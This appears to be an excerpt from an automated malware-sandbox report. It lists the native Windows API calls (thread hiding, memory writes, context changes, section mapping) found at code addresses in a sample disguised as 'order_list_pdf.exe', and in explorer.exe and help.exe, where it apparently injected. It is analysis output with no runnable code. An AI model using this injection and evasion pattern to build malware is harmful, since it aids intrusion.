  Source: C:\Users\user\Desktop\order_list_pdf.exe | Code function: 0_2_02093F33 NtSetInformationThread,TerminateProcess,0_2_02093F33
  Source: C:\Users\user\Desktop\order_list_pdf.exe | Code function: 0_2_02093F70 NtSetInformationThread,TerminateProcess,0_2_02093F70
  Source: C:\Users\user\Desktop\order_list_pdf.exe | Code function: 0_2_0209078E NtSetInformationThread,TerminateProcess,0_2_0209078E
  Source: C:\Users\user\Desktop\order_list_pdf.exe | Code function: 0_2_02092F98 NtWriteVirtualMemory,0_2_02092F98
  Source: C:\Users\user\Desktop\order_list_pdf.exe | Code function: 0_2_02096F97 NtWriteVirtualMemory,0_2_02096F97
  Source: C:\Users\user\Desktop\order_list_pdf.exe | Code function: 0_2_020987A7 NtResumeThread,0_2_020987A7
  Source: C:\Users\user\Desktop\order_list_pdf.exe | Code function: 0_2_02093FB7 NtSetInformationThread,TerminateProcess,0_2_02093FB7
  Source: C:\Users\user\Desktop\order_list_pdf.exe | Code function: 0_2_020907D7 NtSetInformationThread,TerminateProcess,0_2_020907D7
  Source: C:\Users\user\Desktop\order_list_pdf.exe | Code function: 0_2_02093FE4 NtSetInformationThread,TerminateProcess,0_2_02093FE4
  Source: C:\Users\user\Desktop\order_list_pdf.exe | Code function: 0_2_02098407 NtResumeThread,0_2_02098407
  Source: C:\Users\user\Desktop\order_list_pdf.exe | Code function: 0_2_020984A9 NtResumeThread,0_2_020984A9
  Source: C:\Users\user\Desktop\order_list_pdf.exe | Code function: 0_2_020985CC NtResumeThread,0_2_020985CC
  Source: C:\Users\user\Desktop\order_list_pdf.exe | Code function: 0_2_020915C0 NtSetInformationThread,TerminateProcess,0_2_020915C0
  Source: C:\Users\user\Desktop\order_list_pdf.exe | Code function: 0_2_02093DD8 NtSetInformationThread,TerminateProcess,0_2_02093DD8
  Source: C:\Users\user\Desktop\order_list_pdf.exe | Code function: 4_2_1E0DA610 NtAdjustPrivilegesToken,LdrInitializeThunk,4_2_1E0DA610
  Source: C:\Users\user\Desktop\order_list_pdf.exe | Code function: 4_2_1E0DA6A0 NtCreateSection,LdrInitializeThunk,4_2_1E0DA6A0
  Source: C:\Users\user\Desktop\order_list_pdf.exe | Code function: 4_2_1E0DA700 NtProtectVirtualMemory,LdrInitializeThunk,4_2_1E0DA700
  Source: C:\Users\user\Desktop\order_list_pdf.exe | Code function: 4_2_1E0DA720 NtResumeThread,LdrInitializeThunk,4_2_1E0DA720
  Source: C:\Users\user\Desktop\order_list_pdf.exe | Code function: 4_2_1E0DA750 NtCreateFile,LdrInitializeThunk,4_2_1E0DA750
  Source: C:\Users\user\Desktop\order_list_pdf.exe | Code function: 4_2_1E0DA410 NtQueryInformationToken,LdrInitializeThunk,4_2_1E0DA410
  Source: C:\Users\user\Desktop\order_list_pdf.exe | Code function: 4_2_1E0DA480 NtMapViewOfSection,LdrInitializeThunk,4_2_1E0DA480
  Source: C:\Users\user\Desktop\order_list_pdf.exe | Code function: 4_2_1E0DA4A0 NtUnmapViewOfSection,LdrInitializeThunk,4_2_1E0DA4A0
  Source: C:\Users\user\Desktop\order_list_pdf.exe | Code function: 4_2_1E0DA540 NtDelayExecution,LdrInitializeThunk,4_2_1E0DA540
  Source: C:\Users\user\Desktop\order_list_pdf.exe | Code function: 4_2_1E0DA560 NtQuerySystemInformation,LdrInitializeThunk,4_2_1E0DA560
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 4_2_1E0DA5F0 NtReadVirtualMemory,LdrInitializeThunk,4_2_1E0DA5F0
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 4_2_1E0DA240 NtReadFile,LdrInitializeThunk,4_2_1E0DA240
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 4_2_1E0DA2D0 NtClose,LdrInitializeThunk,4_2_1E0DA2D0
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 4_2_1E0DA360 NtAllocateVirtualMemory,LdrInitializeThunk,4_2_1E0DA360
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 4_2_1E0DA3E0 NtFreeVirtualMemory,LdrInitializeThunk,4_2_1E0DA3E0
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 4_2_1E0DA650 NtQueueApcThread,4_2_1E0DA650
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 4_2_1E0DA6D0 NtCreateProcessEx,4_2_1E0DA6D0
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 4_2_1E0DA710 NtQuerySection,4_2_1E0DA710
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 4_2_1E0DA780 NtOpenDirectoryObject,4_2_1E0DA780
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 4_2_1E0DB410 NtOpenProcessToken,4_2_1E0DB410
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 4_2_1E0DA430 NtQueryVirtualMemory,4_2_1E0DA430
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 4_2_1E0DA460 NtOpenProcess,4_2_1E0DA460
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 4_2_1E0DB470 NtOpenThread,4_2_1E0DB470
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 4_2_1E0DA470 NtSetInformationFile,4_2_1E0DA470
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 4_2_1E0DACE0 NtCreateMutant,4_2_1E0DACE0
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 4_2_1E0DA520 NtEnumerateKey,4_2_1E0DA520
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 4_2_1E0DBD40 NtSuspendThread,4_2_1E0DBD40
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 4_2_1E0DA5A0 NtWriteVirtualMemory,4_2_1E0DA5A0
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 4_2_1E0DA220 NtWaitForSingleObject,4_2_1E0DA220
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 4_2_1E0DBA30 NtSetContextThread,4_2_1E0DBA30
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 4_2_1E0DA260 NtWriteFile,4_2_1E0DA260
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 4_2_1E0DA2F0 NtQueryInformationFile,4_2_1E0DA2F0
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 4_2_1E0DA310 NtEnumerateValueKey,4_2_1E0DA310
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 4_2_1E0DA350 NtQueryValueKey,4_2_1E0DA350
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 4_2_1E0DA370 NtQueryInformationProcess,4_2_1E0DA370
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 4_2_1E0DA3D0 NtCreateKey,4_2_1E0DA3D0
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 4_2_1E0DA800 NtSetValueKey,4_2_1E0DA800
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 4_2_1E0DB0B0 NtGetContextThread,4_2_1E0DB0B0
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 4_2_005683FD NtSetInformationThread,4_2_005683FD
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 4_2_00563E09 NtSetInformationThread,CreateFileA,4_2_00563E09
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 4_2_005626FC NtSetInformationThread,Sleep,TerminateThread,4_2_005626FC
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 4_2_00567EEB NtProtectVirtualMemory,4_2_00567EEB
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 4_2_005606B7 EnumWindows,NtSetInformationThread,4_2_005606B7
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 4_2_00563F33 NtSetInformationThread,NtProtectVirtualMemory,4_2_00563F33
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 4_2_00563721 NtSetInformationThread,4_2_00563721
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 4_2_005688AC NtSetInformationThread,4_2_005688AC
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 4_2_0056391D NtSetInformationThread,4_2_0056391D
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 4_2_00568A07 NtSetInformationThread,4_2_00568A07
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 4_2_00561B6A NtSetInformationThread,4_2_00561B6A
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 4_2_00561313 NtSetInformationThread,4_2_00561313
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 4_2_00563B3E NtSetInformationThread,4_2_00563B3E
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 4_2_00560C63 NtProtectVirtualMemory,4_2_00560C63
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 4_2_00568407 NtSetInformationThread,4_2_00568407
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 4_2_00560C20 NtProtectVirtualMemory,4_2_00560C20
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 4_2_005614C3 NtSetInformationThread,4_2_005614C3
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 4_2_005684A9 NtSetInformationThread,4_2_005684A9
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 4_2_00563DD8 NtSetInformationThread,4_2_00563DD8
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 4_2_005615C0 NtSetInformationThread,4_2_005615C0
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 4_2_005685CC NtSetInformationThread,4_2_005685CC
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 4_2_00568677 NtSetInformationThread,4_2_00568677
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 4_2_00560E94 NtSetInformationThread,4_2_00560E94
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 4_2_005636A8 NtSetInformationThread,4_2_005636A8
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 4_2_00563F70 NtSetInformationThread,4_2_00563F70
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 4_2_0056870F NtSetInformationThread,4_2_0056870F
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 4_2_005607D7 NtSetInformationThread,4_2_005607D7
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 4_2_00563FE4 NtSetInformationThread,4_2_00563FE4
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 4_2_0056078E NtSetInformationThread,4_2_0056078E
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 4_2_00563FB7 NtSetInformationThread,4_2_00563FB7
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 4_2_005687A7 NtSetInformationThread,4_2_005687A7
      Source: C:\Windows\explorer.exeCode function: 5_2_05FF9852 NtCreateFile,5_2_05FF9852
      Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_031EA350 NtQueryValueKey,LdrInitializeThunk,7_2_031EA350
      Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_031EA360 NtAllocateVirtualMemory,LdrInitializeThunk,7_2_031EA360
      Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_031EA3D0 NtCreateKey,LdrInitializeThunk,7_2_031EA3D0
      Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_031EA3E0 NtFreeVirtualMemory,LdrInitializeThunk,7_2_031EA3E0
      Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_031EA240 NtReadFile,LdrInitializeThunk,7_2_031EA240
      Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_031EA2D0 NtClose,LdrInitializeThunk,7_2_031EA2D0
      Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_031EA750 NtCreateFile,LdrInitializeThunk,7_2_031EA750
      Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_031EA610 NtAdjustPrivilegesToken,LdrInitializeThunk,7_2_031EA610
      Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_031EA6A0 NtCreateSection,LdrInitializeThunk,7_2_031EA6A0
      Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_031EA540 NtDelayExecution,LdrInitializeThunk,7_2_031EA540
      Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_031EA560 NtQuerySystemInformation,LdrInitializeThunk,7_2_031EA560
      Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_031EA410 NtQueryInformationToken,LdrInitializeThunk,7_2_031EA410
      Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_031EA480 NtMapViewOfSection,LdrInitializeThunk,7_2_031EA480
      Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_031EACE0 NtCreateMutant,LdrInitializeThunk,7_2_031EACE0
      Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_031EA310 NtEnumerateValueKey,7_2_031EA310
      Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_031EA370 NtQueryInformationProcess,7_2_031EA370
      Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_031EBA30 NtSetContextThread,7_2_031EBA30
      Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_031EA220 NtWaitForSingleObject,7_2_031EA220
      Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_031EA260 NtWriteFile,7_2_031EA260
      Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_031EA2F0 NtQueryInformationFile,7_2_031EA2F0
      Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_031EA800 NtSetValueKey,7_2_031EA800
      Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_031EB0B0 NtGetContextThread,7_2_031EB0B0
      Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_031EA710 NtQuerySection,7_2_031EA710
      Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_031EA700 NtProtectVirtualMemory,7_2_031EA700
      Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_031EA720 NtResumeThread,7_2_031EA720
      Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_031EA780 NtOpenDirectoryObject,7_2_031EA780
      Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_031EA650 NtQueueApcThread,7_2_031EA650
      Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_031EA6D0 NtCreateProcessEx,7_2_031EA6D0
      Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_031EA520 NtEnumerateKey,7_2_031EA520
      Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_031EBD40 NtSuspendThread,7_2_031EBD40
      Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_031EA5A0 NtWriteVirtualMemory,7_2_031EA5A0
      Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_031EA5F0 NtReadVirtualMemory,7_2_031EA5F0
      Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_031EB410 NtOpenProcessToken,7_2_031EB410
      Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_031EA430 NtQueryVirtualMemory,7_2_031EA430
      Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_031EA470 NtSetInformationFile,7_2_031EA470
      Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_031EB470 NtOpenThread,7_2_031EB470
      Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_031EA460 NtOpenProcess,7_2_031EA460
      Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_031EA4A0 NtUnmapViewOfSection,7_2_031EA4A0
      Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_00B06BE0 NtCreateFile,7_2_00B06BE0
      Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_00B06C90 NtReadFile,7_2_00B06C90
      Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_00B06DC0 NtAllocateVirtualMemory,7_2_00B06DC0
      Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_00B06D10 NtClose,7_2_00B06D10
      Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_00B06C8C NtReadFile,7_2_00B06C8C
      Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_00B06DBC NtAllocateVirtualMemory,7_2_00B06DBC
      Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_00B06D0A NtClose,7_2_00B06D0A
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 0_2_004020270_2_00402027
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 0_2_004020400_2_00402040
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 0_2_0040204C0_2_0040204C
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 0_2_004038680_2_00403868
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 0_2_004028770_2_00402877
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 0_2_0040207E0_2_0040207E
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 0_2_0040F0080_2_0040F008
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 0_2_0040300E0_2_0040300E
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 0_2_004038130_2_00403813
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 0_2_004040150_2_00404015
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 0_2_004030220_2_00403022
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 0_2_004040280_2_00404028
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 0_2_0040282F0_2_0040282F
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 0_2_004040350_2_00404035
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 0_2_0040303C0_2_0040303C
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 0_2_004040D00_2_004040D0
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 0_2_004020D30_2_004020D3
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 0_2_004030EA0_2_004030EA
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 0_2_004038FA0_2_004038FA
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 0_2_004028FA0_2_004028FA
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 0_2_004038800_2_00403880
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 0_2_0040408C0_2_0040408C
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 0_2_004028920_2_00402892
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 0_2_0040389A0_2_0040389A
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 0_2_004028AD0_2_004028AD
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 0_2_004030AF0_2_004030AF
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 0_2_004038B40_2_004038B4
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 0_2_004039520_2_00403952
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 0_2_004031600_2_00403160
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 0_2_004031240_2_00403124
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 0_2_004031330_2_00403133
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 0_2_004039C00_2_004039C0
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 0_2_004029C90_2_004029C9
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 0_2_004021D40_2_004021D4
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 0_2_004029DD0_2_004029DD
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 0_2_004041EF0_2_004041EF
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 0_2_004029810_2_00402981
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 0_2_0040218F0_2_0040218F
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 0_2_0040319D0_2_0040319D
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 0_2_004039A40_2_004039A4
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 0_2_004022400_2_00402240
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 0_2_004022590_2_00402259
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 0_2_00403A5F0_2_00403A5F
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 0_2_00402A710_2_00402A71
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 0_2_004032740_2_00403274
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 0_2_00403A0D0_2_00403A0D
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 0_2_0040421B0_2_0040421B
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 0_2_00402A1C0_2_00402A1C
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 0_2_0040222E0_2_0040222E
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 0_2_004032350_2_00403235
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 0_2_00402AD30_2_00402AD3
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 0_2_004022E10_2_004022E1
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 0_2_00403AEC0_2_00403AEC
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 0_2_004032FD0_2_004032FD
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 0_2_00402A830_2_00402A83
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 0_2_0040228B0_2_0040228B
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 0_2_0040328B0_2_0040328B
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 0_2_00403A8B0_2_00403A8B
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 0_2_00402A9B0_2_00402A9B
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 0_2_004042BC0_2_004042BC
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 0_2_00403B540_2_00403B54
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 0_2_0040235E0_2_0040235E
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 0_2_004043610_2_00404361
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 0_2_0040336B0_2_0040336B
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 0_2_00403B6C0_2_00403B6C
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 0_2_00403B000_2_00403B00
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 0_2_004043000_2_00404300
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 0_2_00402B2A0_2_00402B2A
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 0_2_004033310_2_00403331
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 0_2_00403B3C0_2_00403B3C
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 0_2_00402BCC0_2_00402BCC
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 0_2_00403BD20_2_00403BD2
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 0_2_004043E40_2_004043E4
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 0_2_00403BE80_2_00403BE8
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 0_2_004033FB0_2_004033FB
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 0_2_00403BFE0_2_00403BFE
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 0_2_004043A30_2_004043A3
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 0_2_00403C4A0_2_00403C4A
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 0_2_0040344F0_2_0040344F
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 0_2_004024530_2_00402453
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 0_2_00403C5A0_2_00403C5A
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 0_2_004024690_2_00402469
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 0_2_00403C720_2_00403C72
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 0_2_0040347D0_2_0040347D
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 0_2_004034080_2_00403408
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 0_2_00402C0C0_2_00402C0C
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 0_2_00403C160_2_00403C16
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 0_2_004024170_2_00402417
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 0_2_00402C350_2_00402C35
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 0_2_00402CD40_2_00402CD4
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 0_2_004034FB0_2_004034FB
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 0_2_00403CFD0_2_00403CFD
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 0_2_00403C880_2_00403C88
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 0_2_00402C8C0_2_00402C8C
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 0_2_0040349E0_2_0040349E
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 0_2_00403CA20_2_00403CA2
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 0_2_00402CA70_2_00402CA7
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 0_2_004044AD0_2_004044AD
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 0_2_004034B30_2_004034B3
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 0_2_004024B70_2_004024B7
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 0_2_0040354D0_2_0040354D
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 0_2_00402D590_2_00402D59
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 0_2_004025750_2_00402575
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 0_2_004035760_2_00403576
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 0_2_00403D760_2_00403D76
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 0_2_00402D7D0_2_00402D7D
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 0_2_0040350C0_2_0040350C
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 0_2_00402D1B0_2_00402D1B
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 0_2_004035260_2_00403526
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 0_2_00403DCC0_2_00403DCC
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 0_2_0040EDCC0_2_0040EDCC
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 0_2_004025820_2_00402582
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 0_2_00402D8E0_2_00402D8E
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 0_2_00403D990_2_00403D99
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 0_2_004025AA0_2_004025AA
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 0_2_00403E4E0_2_00403E4E
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 0_2_004026590_2_00402659
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 0_2_004026670_2_00402667
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 0_2_00402E720_2_00402E72
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 0_2_004036760_2_00403676
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 0_2_0040260D0_2_0040260D
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 0_2_00403E1A0_2_00403E1A
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 0_2_004026280_2_00402628
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 0_2_00403EC50_2_00403EC5
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 0_2_004026C70_2_004026C7
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 0_2_004036EA0_2_004036EA
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 0_2_004036F30_2_004036F3
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 0_2_00403E880_2_00403E88
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 0_2_004036900_2_00403690
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 0_2_0040369C0_2_0040369C
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 0_2_00402EAD0_2_00402EAD
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 0_2_00403EB20_2_00403EB2
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 0_2_0040274A0_2_0040274A
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 0_2_004037520_2_00403752
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 0_2_00402F6E0_2_00402F6E
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 0_2_004037780_2_00403778
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 0_2_00402F020_2_00402F02
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 0_2_0040371B0_2_0040371B
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 0_2_00402F1D0_2_00402F1D
